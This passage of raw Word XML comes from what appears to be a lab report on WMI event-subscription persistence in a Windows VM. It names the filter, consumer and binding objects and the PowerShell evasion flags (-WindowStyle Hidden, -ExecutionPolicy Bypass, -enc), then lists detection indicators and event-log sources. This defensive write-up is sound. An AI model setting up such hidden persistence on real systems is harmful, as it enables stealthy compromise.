          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>As a result, PowerShell executes automatically at the defined interval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC33BB2" w14:textId="404BC458" w:rsidR="77AA56DF" w:rsidRDefault="2B759FBA" w:rsidP="77AA56DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
        </w:rPr>
        <w:t>Commands / Steps Observed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Victim – Windows VM, Admin PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05979962" w14:textId="2E4C9D21" w:rsidR="42DCFEF5" w:rsidRDefault="1655632F" w:rsidP="0D187993">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7811B252" wp14:editId="51CE04BC">
            <wp:extent cx="5829300" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2050827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27080" name="Picture 2050827080"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5829300" cy="2200275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A PowerShell script was executed to create:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9D98C" w14:textId="538C3F3F" w:rsidR="42DCFEF5" w:rsidRDefault="42DCFEF5" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Filter: DemoSystemUpdateFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A548906" w14:textId="7037365F" w:rsidR="42DCFEF5" w:rsidRDefault="42DCFEF5" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Consumer: DemoSystemUpdateConsumer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF70E51" w14:textId="63928667" w:rsidR="42DCFEF5" w:rsidRDefault="42DCFEF5" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Binding between the two objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEC86DA" w14:textId="5BF1D9E6" w:rsidR="42DCFEF5" w:rsidRDefault="42DCFEF5" w:rsidP="42DCFEF5">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The payload uses PowerShell with stealthy parameters such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CD38C5" w14:textId="340574B9" w:rsidR="42DCFEF5" w:rsidRDefault="42DCFEF5" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-WindowStyle Hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C54BFB6" w14:textId="2BAF0BB3" w:rsidR="42DCFEF5" w:rsidRDefault="42DCFEF5" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-ExecutionPolicy Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C00CE3" w14:textId="1062D52B" w:rsidR="42DCFEF5" w:rsidRDefault="42DCFEF5" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-enc (Base64 encoded command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261015C1" w14:textId="7185E979" w:rsidR="32AED7DE" w:rsidRDefault="32AED7DE" w:rsidP="32AED7DE">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Expected outcome / impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3657B647" w14:textId="1C348BB6" w:rsidR="08306DFE" w:rsidRDefault="08306DFE" w:rsidP="08306DFE">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The WMI subscription remains present in root\subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195CD1AB" w14:textId="1FF05688" w:rsidR="08306DFE" w:rsidRDefault="08306DFE" w:rsidP="08306DFE">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PowerShell launches automatically at intervals without user interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4609A54E" w14:textId="4792B811" w:rsidR="1655632F" w:rsidRDefault="08306DFE" w:rsidP="03776377">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If payload is network-based, the endpoint may attempt repeated outbound connections (callback behavior)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0277C67B" w14:textId="41AEB0E9" w:rsidR="00B8236E" w:rsidRDefault="00B8236E" w:rsidP="00B8236E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc220896696"/>
      <w:commentRangeStart w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Detection / IOCs</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
      <w:commentRangeEnd w:id="40"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:commentReference w:id="40"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF7A2BA" w14:textId="358CB128" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc220896697"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>A) Host-based IOCs (WMI Persistence Footprint)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="738B37BB" w14:textId="32BE91A2" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Where to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>check:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> root\subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A31F7F" w14:textId="74265F22" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Key objects indicating compromise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6DA3E6" w14:textId="02D3ACB9" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>__EventFilter (example name: DemoSystemUpdateFilter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0B6ED5" w14:textId="5FC8F6B0" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>CommandLineEventConsumer (example name: DemoSystemUpdateConsumer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077A7257" w14:textId="1DF75026" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>__FilterToConsumerBinding linking the above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49376713" w14:textId="0D21DC3A" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Strong IOC:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> The consumer’s stored command line contains suspicious PowerShell flags:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC2E49A" w14:textId="766310FB" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-WindowStyle Hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A7CAC6" w14:textId="4414B015" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-ExecutionPolicy Bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B89F803" w14:textId="30714D51" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>-enc / -EncodedCommand</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A831DA" w14:textId="7561F8B1" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="06094D31">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>These are commonly used to hide execution and evade basic detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286035FF" w14:textId="16BF8FCD" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc220896698"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>B) Windows Event Logs (supporting evidence)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="34E75EF2" w14:textId="4197772E" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Depending on what is enabled on the endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8C3DEE" w14:textId="12551361" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Microsoft-Windows-WMI-Activity/Operational</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for WMI activity related to subscription execution or access to root\subscription.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF22736" w14:textId="2813C966" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Security Event ID 4688 (Process Creation) (if enabled)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> Look for powershell.exe launched with encoded command flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB19B2B" w14:textId="476FD317" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Sysmon (if enabled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03145FFD" w14:textId="0CBF729A" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Event ID 1: Process Create (PowerShell with command line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B4DCA1" w14:textId="4C276423" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="002E72EC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
        </w:rPr>
        <w:t>Event ID 19/20/21: WMI filter/consumer/binding creation (best evidence for WMI persistence)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315041D7" w14:textId="303E7F73" w:rsidR="6EFC9E73" w:rsidRDefault="6EFC9E73" w:rsidP="6EFC9E73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="281" w:after="281"/>
        <w:rPr>
